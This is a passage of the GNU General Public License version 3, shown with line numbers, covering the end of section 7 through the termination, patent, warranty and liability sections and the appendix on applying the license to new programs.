| Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . --------------------------------------------------------------------------------